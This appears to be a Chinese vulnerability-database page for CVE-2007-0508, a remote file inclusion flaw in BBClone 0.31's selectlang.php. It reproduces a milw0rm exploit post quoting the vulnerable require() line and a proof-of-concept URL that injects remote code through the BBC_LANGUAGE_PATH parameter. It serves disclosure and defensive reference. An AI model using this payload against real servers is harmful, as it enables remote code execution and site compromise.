BBClone 'selectlang.php' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112063 漏洞类型 未知
发布时间 2007-01-23 更新时间 2007-01-25
CVE编号 CVE-2007-0508 CNNVD-ID CNNVD-200701-442
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3183
https://www.securityfocus.com/bid/86738
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-442
|漏洞详情
BBClone0.31版本的lib/selectlang.php中存在PHP远程文件包含漏洞。远程攻击者可以借助BBC_LANGUAGE_PATH参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
------------------------------------------------------------------------------------------------------------------------
Script:bbclone
Affected Version:0.31
Downlaoad:http://sindominio.net/ayuda/bbclone-0.31-esp.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (lib/selectlang.php)
Vul Code;
require($BBC_LANGUAGE_PATH . $BBC_LANGUAGE . ".php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/lib/selectlang.php?BBC_LANGUAGE_PATH=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-23]
|受影响的产品
BBClone BBClone 0.31
|参考资料

来源:MILW0RM
名称:3183
链接:http://www.milw0rm.com/exploits/3183
来源:VUPEN
名称:ADV-2007-0318
链接:http://www.frsirt.com/english/advisories/2007/0318
来源:SECUNIA
名称:23874
链接:http://secunia.com/advisories/23874
来源:OSVDB
名称:32957
链接:http://osvdb.org/32957
来源:MILW0RM
名称:3183
链接:http://milw0rm.com/exploits/3183